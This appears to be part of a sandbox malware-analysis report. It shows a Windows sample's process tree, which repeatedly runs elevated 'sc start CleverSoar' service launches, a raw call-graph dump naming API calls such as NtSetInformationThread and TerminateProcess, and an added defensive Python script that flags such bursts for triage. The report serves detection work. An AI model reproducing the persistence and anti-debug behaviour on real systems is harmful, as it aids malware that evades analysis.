                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:82
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:83
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:84
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:85
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:86
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:87
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:88
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:89
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:90
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:91
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:92
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:93
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:94
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:95
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:96
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:97
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:98
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:99
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:100
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:101
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:102
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:103
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:104
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:105
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:106
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:107
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:108
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:267
                                  Start time:23:17:50
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Has exited:false
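The process list above shows the same three-process pattern repeated about ten times within two seconds (targets 81 through 108): an elevated `cmd.exe` running `cmd /c start sc start CleverSoar`, the `sc.exe` child running `sc start CleverSoar`, and the `conhost.exe` console host each of them spawns. As an added triage helper, not part of the Joe Sandbox report or of the analysed sample, the script below parses the report's own `Target ID:` / `Path:` / `Commandline:` block format and flags bursts of `sc start <service>` launches, reporting the service name, how many direct `sc.exe` launches and `cmd /c start` wrappers were seen, whether any ran elevated, and the time span of the burst. The `SAMPLE` string is a constructed excerpt in the report's format (a subset of the targets shown above), and the `min_launches` threshold and 60-second window are assumptions chosen for illustration.

```python
"""Flag repeated `sc start <service>` launches in a Joe Sandbox process list.

Added example, not code from the report or the sample under analysis.
SAMPLE is a constructed excerpt mirroring the report's block format.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE = r"""Target ID:81
Start time:23:17:42
Start date:22/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true

Target ID:82
Start time:23:17:42
Start date:22/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true

Target ID:83
Start time:23:17:42
Start date:22/12/2024
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Has elevated privileges:true

Target ID:84
Start time:23:17:43
Start date:22/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true

Target ID:85
Start time:23:17:43
Start date:22/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true

Target ID:88
Start time:23:17:43
Start date:22/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true
"""

# Matches "sc start <name>" whether typed directly or wrapped in "cmd /c start ...".
SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.IGNORECASE)


def parse_processes(text):
    """Split report text into one dict per 'Target ID:' block (key -> value)."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.strip().partition(":")  # first ':' only; times keep theirs
            if sep:
                entry[key] = value
        if "Target ID" in entry:
            procs.append(entry)
    return procs


def _started_at(proc):
    """Combine the report's 'Start date' (dd/mm/yyyy) and 'Start time' into a datetime."""
    return datetime.strptime(f"{proc['Start date']} {proc['Start time']}", "%d/%m/%Y %H:%M:%S")


def service_start_bursts(procs, min_launches=3, window_seconds=60):
    """Group 'sc start' launches by service name and flag short, repeated bursts."""
    by_service = defaultdict(list)
    for proc in procs:
        match = SC_START.search(proc.get("Commandline", ""))
        if match:
            by_service[match.group(1)].append(proc)

    findings = {}
    for service, hits in by_service.items():
        direct = [p for p in hits if p.get("Path", "").lower().endswith("\\sc.exe")]
        wrappers = [p for p in hits if p.get("Path", "").lower().endswith("\\cmd.exe")]
        times = sorted(_started_at(p) for p in hits)
        span = (times[-1] - times[0]).total_seconds()
        findings[service] = {
            "sc_launches": len(direct),
            "cmd_wrappers": len(wrappers),
            "elevated": any(p.get("Has elevated privileges") == "true" for p in hits),
            "span_seconds": span,
            "suspicious": len(direct) >= min_launches and span <= window_seconds,
        }
    return findings


if __name__ == "__main__":
    for service, info in service_start_bursts(parse_processes(SAMPLE)).items():
        print(service, info)
```

On the full report this yields a single service name, `CleverSoar`, so the name itself is the indicator to pivot on (service creation events, the driver or binary registered under that name, and `sc query CleverSoar` on a suspect host); the burst of retries is the behavioural signal.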


                                    Execution Graph

                                    Execution Coverage:2.4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:15.5%
                                    Total number of Nodes:793
                                    Total number of Limit Nodes:13
execution_graph: [rendered call-graph node/edge dump omitted; it is not recoverable as text and is cut off mid-line in the source. Windows API calls named in the graph nodes: CreateFileA, CreateProcessA, WaitForSingleObject, CloseHandle, FindFirstFileA, FindClose, ReadFile, ReadConsoleW, GetConsoleMode, GetLastError, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, IsProcessorFeaturePresent, RaiseException, Sleep, GetCurrentProcess, TerminateProcess. The remaining nodes are MSVC runtime and STL internals (__dosmaperr, __wsopen_s, __fassign, _free, _strlen, std::_Facet_Register, std::ios_base::_Ios_base_dtor, std::_Lockit::_Lockit, std::invalid_argument::invalid_argument).]
std::_Lockit::_Lockit 66348->66362 66355 6c17ae6c 66350->66355 66351 6c17af5c 66363 6c16c5a9 EnterCriticalSection 66351->66363 66354 6c17af6f 66354->66350 66364 6c1703b6 LeaveCriticalSection 66355->66364 66357 6c16fda3 66357->66308 66357->66332 66358->66342 66359->66342 66360->66346 66361->66348 66362->66351 66363->66354 66364->66357 66366 6c17b133 66365->66366 66367 6c17b146 66366->66367 66371 6c17b15b 66366->66371 66381 6c170120 18 API calls __fassign 66367->66381 66369 6c17b0a7 66369->66336 66378 6c183fde 66369->66378 66376 6c17b27b 66371->66376 66382 6c183ea8 37 API calls __fassign 66371->66382 66373 6c17b2cb 66373->66376 66383 6c183ea8 37 API calls __fassign 66373->66383 66375 6c17b2e9 66375->66376 66384 6c183ea8 37 API calls __fassign 66375->66384 66376->66369 66385 6c170120 18 API calls __fassign 66376->66385 66386 6c184396 66378->66386 66381->66369 66382->66373 66383->66375 66384->66376 66385->66369 66388 6c1843a2 __wsopen_s 66386->66388 66387 6c1843a9 66404 6c170120 18 API calls __fassign 66387->66404 66388->66387 66389 6c1843d4 66388->66389 66395 6c183ffe 66389->66395 66394 6c183ff9 66394->66336 66406 6c1706cb 66395->66406 66400 6c184034 66402 6c184066 66400->66402 66446 6c1747bb HeapFree GetLastError _free 66400->66446 66405 6c18442b LeaveCriticalSection __wsopen_s 66402->66405 66404->66394 66405->66394 66407 6c16bceb __fassign 37 API calls 66406->66407 66408 6c1706dd 66407->66408 66409 6c1769d5 __wsopen_s 5 API calls 66408->66409 66410 6c1706ef 66408->66410 66409->66410 66411 6c16bdf6 66410->66411 66412 6c16be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 66411->66412 66413 6c16be0e 66412->66413 66413->66400 66414 6c18406c 66413->66414 66415 6c1844ec __wsopen_s 18 API calls 66414->66415 66416 6c184089 66415->66416 66417 6c18160c __wsopen_s 14 API calls 66416->66417 66419 6c18409e __dosmaperr 66416->66419 66418 6c1840bc 66417->66418 66418->66419 66420 6c184457 __wsopen_s CreateFileW 66418->66420 66419->66400 66426 6c184115 
66420->66426 66421 6c184192 GetFileType 66422 6c18419d GetLastError 66421->66422 66423 6c1841e4 66421->66423 66425 6c16f9f2 __dosmaperr 66422->66425 66429 6c1817b0 __wsopen_s SetStdHandle 66423->66429 66424 6c184167 GetLastError 66424->66419 66427 6c1841ab CloseHandle 66425->66427 66426->66421 66426->66424 66428 6c184457 __wsopen_s CreateFileW 66426->66428 66427->66419 66443 6c1841d4 66427->66443 66430 6c18415a 66428->66430 66431 6c184205 66429->66431 66430->66421 66430->66424 66432 6c184251 66431->66432 66433 6c184666 __wsopen_s 70 API calls 66431->66433 66434 6c184710 __wsopen_s 70 API calls 66432->66434 66436 6c184258 66432->66436 66433->66432 66435 6c184286 66434->66435 66435->66436 66438 6c184294 66435->66438 66437 6c17b925 __wsopen_s 21 API calls 66436->66437 66437->66419 66438->66419 66439 6c184310 CloseHandle 66438->66439 66440 6c184457 __wsopen_s CreateFileW 66439->66440 66441 6c18433b 66440->66441 66442 6c184345 GetLastError 66441->66442 66441->66443 66444 6c184351 __dosmaperr 66442->66444 66443->66419 66445 6c18171f __wsopen_s SetStdHandle 66444->66445 66445->66443 66446->66402 66447->66318 66449 6c170bbe 66448->66449 66450 6c170ba9 66448->66450 66453 6c170bb9 66449->66453 66464 6c170cb9 66449->66464 66486 6c170120 18 API calls __fassign 66450->66486 66453->66322 66458 6c170be1 66479 6c17b898 66458->66479 66460 6c170be7 66460->66453 66487 6c1747bb HeapFree GetLastError _free 66460->66487 66462->66320 66463->66320 66465 6c170cd1 66464->66465 66466 6c170bd3 66464->66466 66465->66466 66467 6c179c60 18 API calls 66465->66467 66470 6c17873e 66466->66470 66468 6c170cef 66467->66468 66488 6c17bb6c 66468->66488 66471 6c178755 66470->66471 66472 6c170bdb 66470->66472 66471->66472 66544 6c1747bb HeapFree GetLastError _free 66471->66544 66474 6c179c60 66472->66474 66475 6c179c81 66474->66475 66476 6c179c6c 66474->66476 66475->66458 66545 6c170120 18 API calls __fassign 66476->66545 66478 6c179c7c 66478->66458 66480 6c17b8be 66479->66480 66484 6c17b8a9 __dosmaperr 
66479->66484 66481 6c17b8e5 66480->66481 66482 6c17b907 __dosmaperr 66480->66482 66546 6c17b9c1 66481->66546 66554 6c170120 18 API calls __fassign 66482->66554 66484->66460 66486->66453 66487->66453 66489 6c17bb78 __wsopen_s 66488->66489 66490 6c17bbca 66489->66490 66491 6c17bc33 __dosmaperr 66489->66491 66495 6c17bb80 __dosmaperr 66489->66495 66499 6c181990 EnterCriticalSection 66490->66499 66529 6c170120 18 API calls __fassign 66491->66529 66493 6c17bbd0 66497 6c17bbec __dosmaperr 66493->66497 66500 6c17bc5e 66493->66500 66495->66466 66528 6c17bc2b LeaveCriticalSection __wsopen_s 66497->66528 66499->66493 66501 6c17bc80 66500->66501 66527 6c17bc9c __dosmaperr 66500->66527 66502 6c17bcd4 66501->66502 66504 6c17bc84 __dosmaperr 66501->66504 66503 6c17bce7 66502->66503 66538 6c17ac69 20 API calls __wsopen_s 66502->66538 66530 6c17be40 66503->66530 66537 6c170120 18 API calls __fassign 66504->66537 66509 6c17bcfd 66513 6c17bd26 66509->66513 66514 6c17bd01 66509->66514 66510 6c17bd3c 66511 6c17bd95 WriteFile 66510->66511 66512 6c17bd50 66510->66512 66515 6c17bdb9 GetLastError 66511->66515 66511->66527 66517 6c17bd85 66512->66517 66518 6c17bd5b 66512->66518 66540 6c17beb1 43 API calls 5 library calls 66513->66540 66514->66527 66539 6c17c25b 6 API calls __wsopen_s 66514->66539 66515->66527 66543 6c17c2c3 7 API calls 2 library calls 66517->66543 66519 6c17bd75 66518->66519 66520 6c17bd60 66518->66520 66542 6c17c487 8 API calls 3 library calls 66519->66542 66523 6c17bd65 66520->66523 66520->66527 66541 6c17c39e 7 API calls 2 library calls 66523->66541 66525 6c17bd73 66525->66527 66527->66497 66528->66495 66529->66495 66531 6c1819e5 __wsopen_s 18 API calls 66530->66531 66532 6c17be51 66531->66532 66533 6c17bcf8 66532->66533 66534 6c1749b2 __Getctype 37 API calls 66532->66534 66533->66509 66533->66510 66535 6c17be74 66534->66535 66535->66533 66536 6c17be8e GetConsoleMode 66535->66536 66536->66533 66537->66527 66538->66503 66539->66527 66540->66527 66541->66525 66542->66525 
66543->66525 66544->66472 66545->66478 66547 6c17b9cd __wsopen_s 66546->66547 66555 6c181990 EnterCriticalSection 66547->66555 66549 6c17b9db 66551 6c17ba08 66549->66551 66556 6c17b925 66549->66556 66569 6c17ba41 LeaveCriticalSection __wsopen_s 66551->66569 66553 6c17ba2a 66553->66484 66554->66484 66555->66549 66570 6c1815a2 66556->66570 66558 6c17b93b 66575 6c18171f SetStdHandle __dosmaperr __wsopen_s 66558->66575 66560 6c17b935 66560->66558 66561 6c17b96d 66560->66561 66562 6c1815a2 __wsopen_s 18 API calls 66560->66562 66561->66558 66563 6c1815a2 __wsopen_s 18 API calls 66561->66563 66564 6c17b964 66562->66564 66565 6c17b979 CloseHandle 66563->66565 66566 6c1815a2 __wsopen_s 18 API calls 66564->66566 66565->66558 66567 6c17b985 GetLastError 66565->66567 66566->66561 66567->66558 66568 6c17b993 __dosmaperr 66568->66551 66569->66553 66571 6c1815af __dosmaperr 66570->66571 66573 6c1815c4 __dosmaperr 66570->66573 66571->66560 66572 6c1815e9 66572->66560 66573->66572 66574 6c170120 __fassign 18 API calls 66573->66574 66574->66571 66575->66568 66576->66169 66577->66171 66578->66173 66580 6c1665dc 66579->66580 66581 6c166608 66579->66581 66595 6c166601 66580->66595 66602 6c032250 30 API calls 66580->66602 66586 6c166619 66581->66586 66600 6c033560 32 API calls std::_Xinvalid_argument 66581->66600 66584 6c1667e8 66603 6c032340 24 API calls 66584->66603 66586->66595 66601 6c032f60 42 API calls 4 library calls 66586->66601 66587 6c1667f7 66604 6c169379 RaiseException 66587->66604 66591 6c166827 66606 6c032340 24 API calls 66591->66606 66593 6c16683d 66607 6c169379 RaiseException 66593->66607 66595->66183 66596 6c166653 66596->66595 66605 6c032250 30 API calls 66596->66605 66597->66183 66598->66183 66599->66183 66600->66586 66601->66596 66602->66584 66603->66587 66604->66596 66605->66591 66606->66593 66607->66595 66608->66189 66609->66191 66610->66189 66611->66189 66612->66189 66614 6c03022e 66613->66614 66615 6c0304d6 66614->66615 66620 6c1717db 66614->66620 66615->66200 
66617->66202 66618->66204 66619->66206 66621 6c171806 66620->66621 66622 6c1717e9 66620->66622 66621->66614 66622->66621 66623 6c17180a 66622->66623 66624 6c1717f6 66622->66624 66628 6c171a02 66623->66628 66636 6c170120 18 API calls __fassign 66624->66636 66629 6c171a0e __wsopen_s 66628->66629 66637 6c16c5a9 EnterCriticalSection 66629->66637 66631 6c171a1c 66638 6c1719bf 66631->66638 66635 6c17183c 66635->66614 66636->66621 66637->66631 66646 6c1785a6 66638->66646 66644 6c1719f9 66645 6c171a51 LeaveCriticalSection 66644->66645 66645->66635 66647 6c179c60 18 API calls 66646->66647 66648 6c1785b7 66647->66648 66649 6c1819e5 __wsopen_s 18 API calls 66648->66649 66651 6c1785bd __wsopen_s 66649->66651 66650 6c1719d3 66653 6c17183e 66650->66653 66651->66650 66663 6c1747bb HeapFree GetLastError _free 66651->66663 66655 6c171850 66653->66655 66657 6c17186e 66653->66657 66654 6c17185e 66664 6c170120 18 API calls __fassign 66654->66664 66655->66654 66655->66657 66660 6c171886 _Yarn 66655->66660 66662 6c178659 62 API calls 66657->66662 66658 6c170cb9 62 API calls 66658->66660 66659 6c179c60 18 API calls 66659->66660 66660->66657 66660->66658 66660->66659 66661 6c17bb6c __wsopen_s 62 API calls 66660->66661 66661->66660 66662->66644 66663->66650 66664->66657 66665->66223 66666->66225 66667->66227 66668->66124 66669->66131 66670->66133 66671->66126 66672->66129 66673 6c16ef3f 66674 6c16ef4b __wsopen_s 66673->66674 66675 6c16ef52 GetLastError ExitThread 66674->66675 66676 6c16ef5f 66674->66676 66685 6c1749b2 GetLastError 66676->66685 66681 6c16ef7b 66719 6c16eeaa 16 API calls 2 library calls 66681->66719 66684 6c16ef9d 66686 6c1749cf 66685->66686 66687 6c1749c9 66685->66687 66691 6c1749d5 SetLastError 66686->66691 66721 6c176b62 6 API calls std::_Lockit::_Lockit 66686->66721 66720 6c176b23 6 API calls std::_Lockit::_Lockit 66687->66720 66690 6c1749ed 66690->66691 66692 6c1749f1 66690->66692 66698 6c16ef64 66691->66698 66699 6c174a69 66691->66699 66722 6c1771e5 
EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66692->66722 66695 6c1749fd 66696 6c174a05 66695->66696 66697 6c174a1c 66695->66697 66723 6c176b62 6 API calls std::_Lockit::_Lockit 66696->66723 66725 6c176b62 6 API calls std::_Lockit::_Lockit 66697->66725 66713 6c179d66 66698->66713 66728 6c170ac9 37 API calls std::locale::_Setgloballocale 66699->66728 66704 6c174a28 66706 6c174a3d 66704->66706 66707 6c174a2c 66704->66707 66705 6c174a13 66724 6c1747bb HeapFree GetLastError _free 66705->66724 66727 6c1747bb HeapFree GetLastError _free 66706->66727 66726 6c176b62 6 API calls std::_Lockit::_Lockit 66707->66726 66710 6c174a19 66710->66691 66712 6c174a4f 66712->66691 66714 6c16ef6f 66713->66714 66715 6c179d78 GetPEB 66713->66715 66714->66681 66718 6c176d6f 5 API calls std::_Lockit::_Lockit 66714->66718 66715->66714 66716 6c179d8b 66715->66716 66729 6c176e18 5 API calls std::_Lockit::_Lockit 66716->66729 66718->66681 66719->66684 66720->66686 66721->66690 66722->66695 66723->66705 66724->66710 66725->66704 66726->66705 66727->66712 66729->66714 66730 6bfe3d62 66732 6bfe3bc0 66730->66732 66731 6bfe3e8a GetCurrentThread NtSetInformationThread 66733 6bfe3eea 66731->66733 66732->66731 66734 6bfff8a3 66735 6bfff887 66734->66735 66736 6c0002ac GetCurrentProcess TerminateProcess 66735->66736 66737 6c0002ca 66736->66737 66738 6bff3b72 66739 6c166a43 std::_Facet_Register 4 API calls 66738->66739 66747 6bff37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66739->66747 66740 6c15aec0 2 API calls 66740->66747 66741 6c00639e 66761 6c170130 18 API calls 2 library calls 66741->66761 66743 6c006ba0 104 API calls 66743->66747 66745 6c007090 77 API calls 66745->66747 66746 6c02e010 67 API calls 66746->66747 66747->66740 66747->66741 66747->66743 66747->66745 66747->66746 66751 6c006e60 66747->66751 66752 6c006e9f 66751->66752 66758 6c006eb3 66752->66758 66762 6c033560 32 API calls std::_Xinvalid_argument 66752->66762 66756 6c006f5b 66757 6c006f6e 
